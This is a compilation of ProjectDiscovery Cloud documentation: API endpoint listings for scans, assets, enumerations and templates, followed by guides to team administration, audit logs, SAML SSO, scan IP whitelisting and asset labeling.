# Delete Asset
Source: https://docs.projectdiscovery.io/api-reference/assets/delete-asset
delete /v1/assets/{asset_Id}
Delete asset by ID
# Get Asset Content
Source: https://docs.projectdiscovery.io/api-reference/assets/get-asset-content
get /v1/assets/{asset_id}/contents
Get user asset content
# Get Asset Metadata
Source: https://docs.projectdiscovery.io/api-reference/assets/get-asset-metadata
get /v1/assets/{asset_Id}
Get asset metadata
# Update Asset Content
Source: https://docs.projectdiscovery.io/api-reference/assets/update-asset-content
patch /v1/assets/{asset_id}/contents
Update existing asset content
# Upload Asset
Source: https://docs.projectdiscovery.io/api-reference/assets/upload-asset
post /v1/assets
Manually upload user assets (uploaded to manual enumeration)
# Add Config
Source: https://docs.projectdiscovery.io/api-reference/configurations/add-config
post /v1/scans/config
Add a new scan configuration
# Add excluded templates
Source: https://docs.projectdiscovery.io/api-reference/configurations/add-excluded-templates
post /v1/scans/config/exclude
Add excluded templates
# Delete Config
Source: https://docs.projectdiscovery.io/api-reference/configurations/delete-config
delete /v1/scans/config/{config_id}
Delete scan configuration
# Delete excluded template ids
Source: https://docs.projectdiscovery.io/api-reference/configurations/delete-excluded-template-ids
delete /v1/scans/config/exclude
Delete excluded template ids
# Get Config
Source: https://docs.projectdiscovery.io/api-reference/configurations/get-config
get /v1/scans/config/{config_id}
Get a scan configuration
# Get Configs List
Source: https://docs.projectdiscovery.io/api-reference/configurations/get-configs-list
get /v1/scans/config
Get user scan configurations list
# Get excluded templates
Source: https://docs.projectdiscovery.io/api-reference/configurations/get-excluded-templates
get /v1/scans/config/exclude
Get excluded templates
# Update Config
Source: https://docs.projectdiscovery.io/api-reference/configurations/update-config
patch /v1/scans/config/{config_id}
Update existing scan configuration
# Get elogs of given scan id
Source: https://docs.projectdiscovery.io/api-reference/elog/get-elogs-of-given-scan-id
get /v1/scans/{scan_id}/error_log
# Create Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/create-enumeration
post /v1/asset/enumerate
Create a new enumeration
# Delete Bulk Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/delete-assets-in-bulk
delete /v1/asset/enumerate
Delete enumeration by enumerate ids
# Delete Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/delete-enumeration
delete /v1/asset/enumerate/{enumerate_id}
Delete enumeration by enumerate_id
# Delete Enumeration Schedule
Source: https://docs.projectdiscovery.io/api-reference/enumerations/delete-enumeration-schedule
delete /v1/enumeration/schedule
Delete a re-scan schedule
# Export Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/export-enumeration
get /v1/asset/enumerate/{enum_id}/export
Export enumeration content
# Export Enumeration of user
Source: https://docs.projectdiscovery.io/api-reference/enumerations/export-enumeration-of-user
get /v1/asset/enumerate/export
Export enumeration content
# Get All Enumeration Contents
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-all-enumeration-contents
get /v1/asset/enumerate/contents
Get All enumeration content
# Get all enumeration stats
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-all-enumeration-stats
get /v1/asset/enumerate/stats
# Get Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration
get /v1/asset/enumerate/{enumerate_id}
Get enumeration by enumerate_id
# Get enumeration config
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-config
get /v1/asset/enumerate/{enumerate_id}/config
# Get Enumeration Contents
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-contents
get /v1/asset/enumerate/{enumerate_id}/contents
Get enumeration content by enumerate_id
# Get Enumeration List
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-list
get /v1/asset/enumerate
Get enumeration list
# Get Enumeration Schedules
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-schedules
get /v1/enumeration/schedule
Get enumeration re-scan schedule
# Get enumeration stats
Source: https://docs.projectdiscovery.io/api-reference/enumerations/get-enumeration-stats
get /v1/asset/enumerate/{enumerate_id}/stats
# Group assets by filters
Source: https://docs.projectdiscovery.io/api-reference/enumerations/group-assets-by-filters
get /v1/asset/enumerate/filters
# Group assets by filters for an enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/group-assets-by-filters-for-an-enumeration
get /v1/asset/enumerate/{enumerate_id}/filters
# Rescan Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/rescan-enumeration
post /v1/asset/enumerate/{enumerate_id}/rescan
Re-run a existing enumeration
# Set Enumeration Schedule
Source: https://docs.projectdiscovery.io/api-reference/enumerations/set-enumeration-schedule
post /v1/enumeration/schedule
Set enumeration re-scan frequency
# Stop Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/stop-enumeration
post /v1/asset/enumerate/{enumerate_id}/stop
Stop a running enumeration
# Update Enumeration
Source: https://docs.projectdiscovery.io/api-reference/enumerations/update-enumeration
patch /v1/asset/enumerate/{enumerate_id}
Update enumeration by enumerate_id
# Get audit logs for team
Source: https://docs.projectdiscovery.io/api-reference/get-audit-logs-for-team
get /v1/team/audit_log
# Cloud API Reference Introduction
Source: https://docs.projectdiscovery.io/api-reference/introduction
Details on the ProjectDiscovery API
## Overview
The ProjectDiscovery API v1 is organized around [REST](http://en.wikipedia.org/wiki/Representational_State_Transfer). Our API has resource-oriented URLs, accepts and returns JSON in most cases, and the API uses standard HTTP response codes, authentication, and verbs. Our API also conforms to the [OpenAPI Specification](https://www.openapis.org/).
This API documentation will walk you through each of the available resources, and provides code examples for `cURL`, `Python`, `JavaScript`, `PHP`, `Go` and `Java`. Each endpoint includes the required authorization information and parameters, and provides examples of the response you should expect.
## Authentication
The ProjectDiscovery API uses API keys to authenticate requests. You can view and manage your API key in ProjectDiscovery at [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) under your user information.
Authentication with the API is performed using a custom request header - `X-Api-Key` - which should simply be the value of your API key found with your ProjectDiscovery account.
You must make all API calls over `HTTPS`. Calls made over plain HTTP will fail, as will requests without authentication or without all required parameters.
## Resources
Below (and in the menu on the left) you can find the various resources available to the ProjectDiscovery API.
Your assets (hosts, CIDR ranges, etc.) for scanning.
Access public and private templates as well as AI template creation.
Manage scans, scan schedules, and create new scans.
See and manage vulnerabilities detected by PDCP.
Retest vulnerabilities or run single template/target scans.
See and manage user settings, API keys and more.
# Get All Results
Source: https://docs.projectdiscovery.io/api-reference/results/get-all-results
get /v1/scans/results
Get scans results of a user
# Get Results Stats
Source: https://docs.projectdiscovery.io/api-reference/results/get-results-stats
get /v1/scans/results/stats
Get user scan results stats
# Get Scan Results
Source: https://docs.projectdiscovery.io/api-reference/results/get-scan-results
get /v1/scans/result/{scanId}
get results of specific scan by id
# Get Scan Vulnerability
Source: https://docs.projectdiscovery.io/api-reference/results/get-scan-vulnerability
get /v1/scans/vuln/{vuln_id}
Get scan result vulnerability by ID
# Get Scans Result Filters
Source: https://docs.projectdiscovery.io/api-reference/results/get-scans-result-filters
get /v1/scans/results/filters
Get users scan-result filters
# Get scan log of given scan id
Source: https://docs.projectdiscovery.io/api-reference/scan_log/get-scan-log-of-given-scan-id
get /v1/scans/{scan_id}/scan_log
# Create Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/create-scan
post /v1/scans
Trigger a scan
# Create vulns export to tracker
Source: https://docs.projectdiscovery.io/api-reference/scans/create-vulns-export-to-tracker
post /v1/scans/vulns/{vuln_id}/ticket
Create vulns export to tracker
# Delete Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/delete-scan
delete /v1/scans/{scan_id}
Delete a scan using scanId
# Delete Bulk Scans
Source: https://docs.projectdiscovery.io/api-reference/scans/delete-scan-in-bulk
delete /v1/scans
Delete multiple scans using scan ids
# Delete Scan Schedule
Source: https://docs.projectdiscovery.io/api-reference/scans/delete-scan-schedule
delete /v1/scans/schedule
Delete scan schedule for a user
# Delete Scan Vulnerability
Source: https://docs.projectdiscovery.io/api-reference/scans/delete-scan-vulnerability
delete /v1/scans/vulns
Batch Delete scan vulnerability
# Export Filtered Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/export-filtered-scan
post /v1/scans/{scan_id}/export
Export filtered scan results
# Export Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/export-scan
get /v1/scans/{scan_id}/export
Export scan results
# Export Scan Vulnerability
Source: https://docs.projectdiscovery.io/api-reference/scans/export-scan-vulnerability
get /v1/scans/vuln/{vuln_id}/export
Export a specific scan vulnerability
# Get All Scan Stats
Source: https://docs.projectdiscovery.io/api-reference/scans/get-all-scan-stats
get /v1/scans/stats
Get all scans statistics for a user
# Get All Scans History
Source: https://docs.projectdiscovery.io/api-reference/scans/get-all-scans-history
get /v1/scans/history
Get user scan history details
# Get Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan
get /v1/scans/{scan_id}
Get details of a scan by scan ID
# Get Scan Config
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-config
get /v1/scans/{scan_id}/config
Get scan metadata config
# Get Scan History
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-history
get /v1/scans/{scanId}/history
Get scan history detial by scanId
# Get Scan IPs
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-ips
get /v1/scans/scan_ips
Get list of static IPs used for scan
# Get Scan List
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-list
get /v1/scans
Get user scans status
# Get Scan Schedules
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scan-schedules
get /v1/scans/schedule
Get scan schedules for a user
# Get Scans Token
Source: https://docs.projectdiscovery.io/api-reference/scans/get-scans-token
get /v1/scans/token
Get user scan token usage details
# Import OSS Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/import-oss-scan
post /v1/scans/import
Import scan details
# Rescan scan
Source: https://docs.projectdiscovery.io/api-reference/scans/rescan-scan
post /v1/scans/{scan_id}/rescan
Re-run a existing scan
# Retest vulnerability
Source: https://docs.projectdiscovery.io/api-reference/scans/retest-vulnerability
post /v1/scans/{vuln_id}/retest
Retest a scan vulnerability
# Set Scan Schedule
Source: https://docs.projectdiscovery.io/api-reference/scans/set-scan-schedule
post /v1/scans/schedule
set a scan schedule for a user
# Stop Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/stop-scan
post /v1/scans/{scan_id}/stop
Stop a running scan, not applied in any other state.
# Update Imported Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/update-imported-scan
patch /v1/scans/{scan_id}/import
Import more results to a given scan
# Update Scan
Source: https://docs.projectdiscovery.io/api-reference/scans/update-scan
patch /v1/scans/{scan_id}
Update scan metadata
# Update Scan Config
Source: https://docs.projectdiscovery.io/api-reference/scans/update-scan-config
patch /v1/scans/{scan_id}/config
Update scan metadata config
# Update Vulnerability Labels
Source: https://docs.projectdiscovery.io/api-reference/scans/update-vulnerability-labels
patch /v1/scans/vulns/labels
Batch update vulnerability labels
# Update Vulnerability Status
Source: https://docs.projectdiscovery.io/api-reference/scans/update-vulnerability-status
patch /v1/scans/vulns
Batch update vulnerability status
# Create Template
Source: https://docs.projectdiscovery.io/api-reference/templates/create-template
post /v1/template
Create a private template
# Delete Template
Source: https://docs.projectdiscovery.io/api-reference/templates/delete-template
delete /v1/template/{template_id}
Delete private template using ID
# Generate AI Template
Source: https://docs.projectdiscovery.io/api-reference/templates/generate-ai-template
post /v1/template/ai
Generate a private template with AI Engine
# Get Early Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-early-template
get /v1/template/early/{id}
Get early template text
# Get Early Template List
Source: https://docs.projectdiscovery.io/api-reference/templates/get-early-template-list
get /v1/template/early
Get pdcp early template lists
# Get Github Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-github-template
get /v1/template/github/{id}
Get github template text
# Get Github Template List
Source: https://docs.projectdiscovery.io/api-reference/templates/get-github-template-list
get /v1/template/github
List of all user's github templates
# Get Public Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-public-template
get /v1/template/public/*
Get public template text using path
# Get Public Template List
Source: https://docs.projectdiscovery.io/api-reference/templates/get-public-template-list
get /v1/template/public
Get public-template list
# Get Public Template Stats
Source: https://docs.projectdiscovery.io/api-reference/templates/get-public-template-stats
get /v1/template/stats
Get public template statistics
# Get Share Status
Source: https://docs.projectdiscovery.io/api-reference/templates/get-share-status
get /v1/template/share
Get template sahred status (shared-with-link)
# Get Shared Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-shared-template
get /v1/template/share/{template_id}
Get a shared template text
# Get Template
Source: https://docs.projectdiscovery.io/api-reference/templates/get-template
get /v1/template/{template_id}
Get private template text using ID
# Get Template List
Source: https://docs.projectdiscovery.io/api-reference/templates/get-template-list
get /v1/template
Get user private(my) templates
# Share Template
Source: https://docs.projectdiscovery.io/api-reference/templates/share-template
post /v1/template/share
Share a private template (shared-with-link)
# Update Template
Source: https://docs.projectdiscovery.io/api-reference/templates/update-template
patch /v1/template
Update existing private template
# Update enumeration config
Source: https://docs.projectdiscovery.io/api-reference/update-enumeration-config
patch /v1/asset/enumerate/{enumerate_id}/config
# Create API Key
Source: https://docs.projectdiscovery.io/api-reference/users/create-api-key
post /v1/user/apikey
Create user api-key, this won't create a new api-key if it already exists.
# Delete API Key
Source: https://docs.projectdiscovery.io/api-reference/users/delete-api-key
delete /v1/user/apikey
Delete user api-key
# Get API Key
Source: https://docs.projectdiscovery.io/api-reference/users/get-api-key
get /v1/user/apikey
Get user api-key
# Get User Profile
Source: https://docs.projectdiscovery.io/api-reference/users/get-user-profile
get /v1/user
Get user profile and permissions
# Rotate API Key
Source: https://docs.projectdiscovery.io/api-reference/users/rotate-api-key
post /v1/user/apikey/rotate
Rotate user api-key
# Settings & Administration
Source: https://docs.projectdiscovery.io/cloud/admin
Review administrative, team, and account settings
## Summary
This guide covers general account administration under settings in our cloud platform. These administrative and system settings include details about your account, team settings for administrators, and password/2FA.
If you have questions about settings that are not covered here, or functionality that you think would be helpful - [get in touch.](/help)
For details on other settings check out the guides for those features.
* [Scanning](/cloud/scanning/overview)
* [Assets](/cloud/assets/overview)
* [Templates](/cloud/editor/overview)
## Settings
[Profile settings](https://cloud.projectdiscovery.io/settings) are available from the global navigation under your sign-in (top right) for access to your Profile, Team, Scan IPs and more.
## Profile
Profile displays your username, email address, and the option to delete your account.
*Note: The ability to update these profile components will be available in a future release.*
## Team
Under **Settings → Team** all users can view team settings. Users with the appropriate permissions can also modify team settings and manage team members.
View or update team names, manage team members, and delete teams (supported for team owners)
* Use **Create Team** to create a new team (up to 2 for Pro Tier).
* Modify team settings by selecting a team from the global navigation.
To modify team settings select a team from the global navigation to display those team settings.
### User Types
ProjectDiscovery supports four types of users with the following permissions:
* Owner: Read, write, invite, billing
* Admin: Read, write, invite
* Member: Read, write
* Viewer: Read
### Managing Teams
Teams can be created by Pro and Custom tier users. A Pro subscription supports up to two teams with 10 members. For a larger quantity of teams, or a greater number of members get in touch about a Custom tier configuration.
## Scan IPs
Add Static IPs for greater control over your infrastructure scanning.
## Billing
Purchase, view, or modify your subscription. A subscription to our Pro tier starts at \$250/month for scanning of up to 1000 unique assets.
Additional upgrade options are also available with higher monthly asset limits - reach out to us with any questions about a custom contract.
## Security (Account Security)
Use Security to update your password or to enable 2-factor authentication.
* **Password** creates an account password that provides a login with your email (username) and password, as an alternative to using a linked account for login. These credentials will not replace any existing login configurations (for example:GitHub)
* **Two-step authentication** provides additional authentication for your account with an authenticator application.
# Audit Logs
Source: https://docs.projectdiscovery.io/cloud/admin/audit-logs
Track and monitor all user activities and system events across your organization
Audit Logs are available exclusively for Enterprise customers. Contact our [sales team](https://projectdiscovery.io/request-demo) to learn more about Enterprise features.
ProjectDiscovery's Audit Logs provide comprehensive visibility into all user activities and system events within your organization's ProjectDiscovery Cloud environment. The audit logging system captures detailed information about every significant action, including user logins, asset modifications, scan initiations, configuration changes, and API access events. Each log entry contains essential metadata such as the timestamp, user identity, IP address, action type, and affected resources, enabling security teams to maintain complete accountability and traceability.
The audit logging interface presents events in a chronological timeline, with advanced filtering capabilities that allow you to search and analyze specific types of activities. Security administrators can filter logs based on multiple parameters including time ranges, user identities, action types, and affected resources. This granular filtering helps during security investigations, compliance audits, or when tracking specific changes across your organization's security workflows.
From a security operations perspective, the audit logs serve as a crucial tool for detecting unusual patterns or potentially unauthorized activities. For instance, you can identify unusual scan patterns, track template modifications, or monitor API key usage across your organization. The system retains audit logs for an extended period, ensuring you have historical data available for compliance requirements or security investigations.
Integration capabilities allow you to export audit logs to your existing security information and event management (SIEM) systems through our API. This enables you to incorporate ProjectDiscovery activity data into your broader security monitoring and alerting workflows. The audit log data can be particularly valuable during incident response scenarios, providing a clear timeline of events and actions leading up to or following a security event.
For organizations with compliance requirements, our audit logs help demonstrate adherence to various security frameworks and regulations. The comprehensive logging of user actions, access patterns, and system changes provides the necessary documentation for security audits and compliance reviews. Each log entry is immutable and cryptographically signed, ensuring the integrity of your audit trail.
# SAML SSO
Source: https://docs.projectdiscovery.io/cloud/admin/saml-sso
Enterprise Single Sign-On (SSO) integration for secure team access
SAML SSO is available exclusively for Pro (as an add-on) and Enterprise customers. Contact our [sales team](https://projectdiscovery.io/request-demo) to enable SAML SSO for your organization.
ProjectDiscovery supports Enterprise Single Sign-On (SSO) through SAML 2.0, enabling seamless and secure authentication using your organization's Identity Provider (IdP). Our SAML implementation is powered by Clerk, providing robust support for major identity providers including:
* Microsoft Azure AD
* Google Workspace
* Okta Workforce
* Custom SAML Providers
## Implementation Process
SAML SSO setup requires manual configuration and verification by the ProjectDiscovery team to ensure secure implementation. Here's what to expect:
1. **Initial Setup Request**
* After purchasing a Pro plan with SSO add-on or Enterprise contract
* The ProjectDiscovery team will reach out to begin the configuration process
* You'll be assigned a dedicated technical contact for the setup
2. **Configuration Steps**
* Provide your IdP metadata and certificates
* Configure allowed domains and user attributes
* Set up SAML assertion mapping
* Test the integration in a staging environment
3. **Verification & Go-Live**
* Validate user provisioning and authentication
* Confirm security settings and access controls
* Enable the integration for production use
## Supported Features
Our SAML integration includes comprehensive enterprise-grade features:
* **Automated User Provisioning**
* Just-in-Time (JIT) user creation
* Attribute mapping for user profiles
* Role and permission synchronization
* **Security Controls**
* Domain-based access restrictions
* Enforced SSO for specified domains
* Session management and timeout settings
* **Advanced Options**
* Support for IdP-initiated SSO
* Multi-factor authentication integration
* Custom attribute mapping
## Important Notes
* SAML SSO setup requires manual configuration due to its security-critical nature
* The setup process typically takes 1-2 business days
* All configurations are thoroughly tested before production deployment
* Changes to SAML settings may require ProjectDiscovery team assistance
* Existing users can be migrated to SSO authentication seamlessly
## Getting Started
To enable SAML SSO for your organization:
1. Ensure you have a Pro plan with SSO add-on or Enterprise contract
2. Contact your account representative or [sales team](https://projectdiscovery.io/request-demo)
3. Prepare your IdP configuration details
4. Schedule a setup call with our technical team
Our team will guide you through the entire process, ensuring a secure and successful implementation of SAML SSO for your organization.
# Scan IPs for Whitelisting
Source: https://docs.projectdiscovery.io/cloud/admin/scan-ips
Configure and manage scanning IP addresses for enterprise security controls
Dedicated Scan IPs are available exclusively for Enterprise customers. Contact our [sales team](https://projectdiscovery.io/request-demo) to learn more about Enterprise features.
ProjectDiscovery's Enterprise scanning infrastructure operates from a dedicated set of static IP addresses, enabling organizations to implement precise security controls and whitelisting policies. These fixed IP ranges are exclusively assigned to your organization's scanning activities, providing consistent and identifiable sources for all security assessments conducted through the platform. This dedicated IP infrastructure ensures that your security teams can easily distinguish ProjectDiscovery's legitimate scanning traffic from potential unauthorized scanning attempts.
When configuring your security infrastructure to accommodate ProjectDiscovery scans, you can whitelist these specific IP addresses in your firewalls, Web Application Firewalls (WAFs), or Intrusion Prevention Systems (IPS). This whitelisting approach allows you to maintain strict security controls while ensuring uninterrupted vulnerability scanning operations. The platform provides both IPv4 and IPv6 addresses, supporting organizations with diverse network configurations and compliance requirements.
Enterprise customers can customize scanning behavior on a per-IP basis, including the ability to set specific rate limits, configure custom headers, or assign particular IPs to different types of scans. This granular control helps organizations optimize their scanning operations while maintaining compliance with internal security policies. For instance, you might assign certain IPs for external asset discovery while reserving others for intensive vulnerability scanning, ensuring proper resource allocation and traffic management.
The platform includes monitoring and analytics for scan traffic from these IPs, providing visibility into scanning patterns, bandwidth usage, and potential scanning issues. This monitoring helps security teams optimize their scanning strategies and troubleshoot any connectivity or performance problems. Additionally, if any of your security systems flag scanning activity from these IPs, you can quickly verify the legitimacy of the traffic against your assigned IP ranges.
For organizations operating in regulated environments or with strict security requirements, our dedicated IP infrastructure provides the necessary isolation and control. Each scanning IP is documented and can be included in security compliance documentation, making it easier to demonstrate proper security controls during audits. The platform also supports custom DNS resolution and proxy configurations when needed for specialized scanning scenarios.
# Adding Assets
Source: https://docs.projectdiscovery.io/cloud/assets/adding-assets
Learn how to add and manage assets in ProjectDiscovery
## Overview
Assets in our cloud platform can be any hosts you want to monitor - URLs, IP addresses, or CIDR ranges. There are three primary methods to add assets:
Automatically discover and monitor assets from your root domains
Connect cloud providers to import and sync assets automatically
Programmatically add and manage assets using our REST API
## Asset Discovery
The fastest way to get started is through our asset discovery feature:
1. Navigate to **Assets → Add New Assets**
2. Enter root domains/CIDR/IPs based on your plan:
✓ Up to 10 root domains only
✓ Basic subdomain discovery
✓ HTTP probing
✓ Basic technology detection
✓ Limited cloud asset discovery
✓ Up to 100 root domains
✓ Advanced subdomain enumeration
✓ Port scanning (Top 1000 ports)
✓ Deep technology fingerprinting
✓ Cloud integration
✓ Historical data tracking
✓ Custom discovery schedules
✓ CIDR range scanning
✓ IP block discovery
✓ Network perimeter mapping
✓ Custom limits
✓ Advanced asset enrichment
✓ Advanced cloud correlation
✓ Custom enrichment rules
✓ Dedicated discovery nodes
✓ Priority asset updates
✓ ASN-based discovery
✓ Certificate chain analysis
✓ Subsidiary discovery
✓ Related domain correlation
✓ Company hierarchy mapping
✓ Acquisition tracking
Discovery features can be customized for Enterprise plans. Contact our [sales team](mailto:sales@projectdiscovery.io) for custom requirements.
# Custom & Bulk Asset Labeling
Source: https://docs.projectdiscovery.io/cloud/assets/custom-labeling
Create and manage custom labels for your assets with powerful bulk labeling capabilities
Custom Labels in ProjectDiscovery Cloud are user-defined tags that you can manually assign to any discovered asset. This feature works alongside the automatic, AI-driven labels that the platform generates. While the system's AI assigns labels for website types (e.g., API docs, internal apps, login pages, admin panels) and environments (e.g., production, staging, internal) by default, custom labels give you the flexibility to define your own categories and classifications for assets. In other words, you're not limited to the auto-generated labels – you can tag assets with labels that make sense for your organization's context (such as project names, owner teams, sensitivity, or any internal naming scheme).
### How They Work
Using the ProjectDiscovery Cloud interface, a user can select an asset and assign one or more custom labels to it. These labels then appear alongside the asset in the inventory, just like the AI-generated labels. This manual labeling is valuable for capturing contextual information that automated methods might not know. For example, you might label certain assets as "Critical" if they pertain to core infrastructure, or tag a set of hosts as "Internal" if they should not be exposed to the internet. By labeling assets in a way that mirrors your environment and business, you ensure that important attributes of each asset are immediately visible.
### Benefits
Custom labels allow security teams to organize assets according to custom criteria and quickly spot key asset properties at a glance. This user-driven categorization adds an extra layer of context – teams gain full control over how assets are categorized. It becomes easier to filter and group assets based on these tags (for example, viewing all assets labeled "Internal" or "Web-Server"). Ultimately, this leads to better asset management as the platform helps classify results to help you better organize, contextualize, and prioritize your assets. In practice, custom labels enable workflows like separating production vs. staging assets or flagging high-risk systems, so that teams can focus on relevant subsets of the attack surface during monitoring and scanning.
## Bulk Labeling
ProjectDiscovery Cloud also supports Bulk Labeling, which lets users apply a label to many assets at once, rather than tagging each asset individually. This feature is implemented through the platform's powerful filtering system. Users can filter their asset list by specific criteria and then assign a label to all assets matching that filter in a few clicks. In effect, bulk labeling dramatically speeds up the process of categorizing large numbers of assets.
### How It Works
The platform provides filtering across 14+ attributes of assets – you can narrow results by things like port number, technology, domain, IP, content length, and even by existing labels. Here's how to create and save bulk labels:
1. **Apply Filters**
* Navigate to the Assets view
* Click the "Filter" button in the top left
* Select your desired filter criteria (e.g., port, technology, domain)
* Apply multiple filters to refine your selection
2. **Select Assets**
* After filtering, review the matching assets
3. **Apply Labels**
* Click the "Label" button in the action bar
* Enter your label name or select from existing labels
* Click "Apply" to tag all selected assets
4. **Save as Dynamic Group** (Optional)
* Click "Save Filter" in the top right
* In the pop-up dialog, enter a name for your dynamic group
* Click "Save" to create your dynamic group
Your saved dynamic group will automatically update as new assets matching your filter criteria are discovered. For example, you could label all assets running on port 8088 as 'staging' in just a few clicks. This bulk tagging via filters approach means you don't have to manually edit each asset entry – the system streamlines it for you.
### Advantages
Bulk labeling is especially useful for applying environment or role labels to many assets simultaneously. It ensures consistency at scale – every asset meeting the criteria gets the exact same label, avoiding omissions or typos that might happen with one-by-one tagging. It's also a huge time-saver for large asset sets; teams can categorize hundreds or thousands of assets in seconds by leveraging filters, instead of minutes or hours. By making it easy to tag assets in bulk, ProjectDiscovery helps teams maintain an organized asset inventory even as new data pours in.
## Use Cases and Workflow Integration
Both custom labels and bulk labeling open up new use cases for integrating ProjectDiscovery into security team workflows:
### Environment Segmentation
Teams can mark assets by environment (e.g., Development, Staging, Production) using custom labels. Bulk labeling makes it easy to apply these environment tags en masse. For example, filtering by port 8088 and tagging those assets as "staging" is a quick way to group all staging assets. This segmentation allows different handling of assets based on environment – for instance, running more frequent scans on production assets or applying stricter monitoring to internal-only systems.
### Technology or Port-based Grouping
If many assets share a common attribute (such as a specific open port, technology, or domain pattern), you can filter them out and label them in bulk. For instance, label all assets running an outdated software version as "Legacy" or all assets on port 22 as "SSH-Servers." This practice helps in quickly identifying groups of assets that might require a specific security assessment or patching regimen. The filtering system supports multi-select and complex queries (e.g., all assets on either Nginx or Apache) to refine these groups.
### Dynamic Asset Groups for Monitoring
After labeling assets, those labels can be used to create saved views or dynamic subgroups in the platform. A dynamic subgroup is essentially a saved filter that updates automatically as assets change. For example, once you've labeled certain assets as "Critical", you could save a filter for `label = Critical`. As new assets get tagged with "Critical" (either through AI suggestions or manual labeling), they will automatically appear in that group. This is highly useful for workflows like continuous monitoring or targeted vulnerability scanning – you always have an up-to-date list of assets in that category without rebuilding queries.
### Prioritization and Triage
Custom labels can encode business context such as ownership (e.g., tagging an asset with the responsible team or project name) or criticality (e.g., High-Value, Low-Impact). Using bulk operations, a newly onboarded set of assets can quickly be labeled according to input from asset owners or CMDB data. Thereafter, security analysts can filter by these labels to prioritize issues. For example, during incident response or risk review, one might focus on assets labeled "Production" and "Customer-Facing" first, since an issue on those could be more severe.
# AI-Powered Asset Labeling
Source: https://docs.projectdiscovery.io/cloud/assets/labeling
Automatically categorize and contextualize your assets with AI-driven labeling
Asset labeling is currently in early beta and operates asynchronously. The initial labeling process may take some time as we optimize performance. We're actively working on speed improvements to make this process faster and more efficient.
**Asset labeling** is the automated process of categorizing and contextualizing the assets discovered by ProjectDiscovery. Instead of presenting you with a raw list of domains or IPs, the platform intelligently **classifies assets** by attaching descriptive labels or tags to each one. These labels provide immediate context about what an asset is – for example, distinguishing a marketing website from an API endpoint or identifying a development server versus a production system. By automatically organizing assets into meaningful categories, asset labeling helps security teams understand their attack surface at a glance and focus on what matters most.
In practical terms, once ProjectDiscovery discovers an asset, it will evaluate that asset's characteristics and assign labels that describe its role or nature. For instance, a web application login page might be labeled as a "Login Portal," or a host with a name like *staging.example.com* might get tagged as "Staging Environment" to indicate it's not a production system. Asset labeling bridges the gap between raw asset data and the business context behind those assets, making your asset inventory more informative and easier to navigate.
## How It Works
ProjectDiscovery's asset labeling engine classifies assets by analyzing various pieces of information collected during discovery. It uses a combination of asset metadata, DNS information, HTTP responses, and even screenshots to determine how to label each asset:
* **Asset Metadata:** Basic details about the asset (such as IP addresses, open ports, SSL certificate data, and hosting information) are examined for clues. For example, an SSL certificate's Common Name might reveal the application's name, or an IP's ASN could indicate the cloud provider or organization owning the asset. This metadata helps identify what the asset might be (e.g., a cloud storage bucket, a VPN gateway, etc.) and adds context for labeling.
* **DNS Records:** DNS information is used to infer the asset's purpose or ownership. The domain or subdomain names can be very telling. For instance, an asset under `dev.` or `staging.` subdomains suggests a non-production environment, whereas something like `mail.example.com` could indicate an email server. CNAME records might point to a known service (for example, a CNAME to a SaaS provider's domain), which the platform can recognize and label accordingly. In short, ProjectDiscovery looks at hostnames and DNS details to glean context (like environment, service type, or associated product) that inform the asset's label.
* **HTTP Responses:** For web assets, the content and behavior of the HTTP(S) service are analyzed. The platform uses its HTTP probing capabilities to gather response headers, status codes, and page content. This includes looking at the HTML title, body text, and other fingerprints. Certain keywords or patterns can identify the application type – for example, a page title containing "Login" or a form with password fields likely indicates a login portal, while a default page saying "Welcome to nginx" indicates a generic web server instance. The system also detects technologies and frameworks running on the asset (e.g., identifying a WordPress site or an Apache server from response signatures) via deep technology fingerprinting. All this HTTP-derived information feeds into the labeling decision.
* **Screenshots:** ProjectDiscovery can capture screenshots of discovered web services. These screenshots provide a visual snapshot of the asset's interface. In the asset labeling process, screenshots serve as an additional data point for understanding the asset. For example, a screenshot that shows a login screen or an admin panel UI is a strong indicator of the asset's function (even if the text wasn't conclusive). While the labeling at this beta stage is mostly driven by metadata and textual analysis, having a screenshot means that if automated logic doesn't perfectly categorize an asset, an analyst can quickly glance at the image and understand what the asset is.
Behind the scenes, all these inputs are combined to assign one or multiple labels to the asset. The system uses a rules-based approach (and will continue to get smarter over time) to match patterns or signatures with label categories. For example, if an asset's DNS name contains "api" and the HTTP response returns JSON, a rule might label it as an "API Endpoint." Similarly, a host identified to be running Jenkins (via tech fingerprinting of HTTP response) might get a label like "Jenkins CI" to denote it's a CI/CD service. Each label is essentially a quick descriptor that summarizes an aspect of the asset, allowing you to immediately understand its nature without deep manual investigation.
## Benefits of Automated Labeling
Automated asset labeling brings several advantages to security professionals and engineers managing a large number of assets:
